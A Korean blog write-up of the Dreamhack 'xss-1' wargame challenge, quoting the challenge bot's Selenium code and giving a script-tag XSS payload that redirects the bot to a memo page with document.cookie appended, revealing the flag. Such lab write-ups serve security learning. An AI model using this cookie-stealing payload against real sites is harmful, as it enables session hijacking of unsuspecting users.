TigerDemon

[5주차] Dreamhack XSS-1 본문

2023-SWLUG/CTF 문제 풀이

[5주차] Dreamhack XSS-1

호랑2D 2023. 11. 8. 00:59

https://dreamhack.io/wargame/challenges/28

 

xss-1

여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다. XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다. 플래그 형식은 DH{...} 입니다. 문제 수정 내역

dreamhack.io

위 링크에 들어가면 이렇게 뜬다. flag에 들어가서 어떻게 생겼는지 보았다.

 

일부 코드

def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    try:
        service = Service(executable_path="/chromedriver")
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome(service=service, options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get("http://127.0.0.1:8000/")
        driver.add_cookie(cookie)
        driver.get(url)
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True

 

여기서 read_url 함수를 보면 이 함수에서 쿠키가 생성되고, domain이 127.0.0.1:8000인 것을 알 수 있다.

따라서 그 주소를 확인해야 한다. 

def check_xss(param, name, cookie={"name": "name", "value": "value"}):
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}#{name}"
    return read_url(url, cookie)

 

이 부분을 보면 입력한 URL을 참조한다는 것을 알 수 있다. flag 함수에서 check_xss 함수로 넘어가기 떄문에 

<script>location.href="http://127.0.0.1:8000/memo?memo=hello"+document.cookie;</script>

라고 전체 경로를 입력하면 FLAG 값을 알 수 있다.

위 사진처럼 입력을 하고 memo에 들어가면 이렇게 FLAG 값이 뜬다.

 

'2023-SWLUG > CTF 문제 풀이' 카테고리의 다른 글

[5주차] Dreamhack XSS-2  (0) 2023.11.08
[5주차] XSS-Game level-5  (0) 2023.11.08
[5주차] Dreamhack DOM XSS  (0) 2023.11.08
[4주차] Dreamhack simple_sqli  (0) 2023.11.01
[4주차] LORD OF SQLINJECTION_orc  (0) 2023.11.01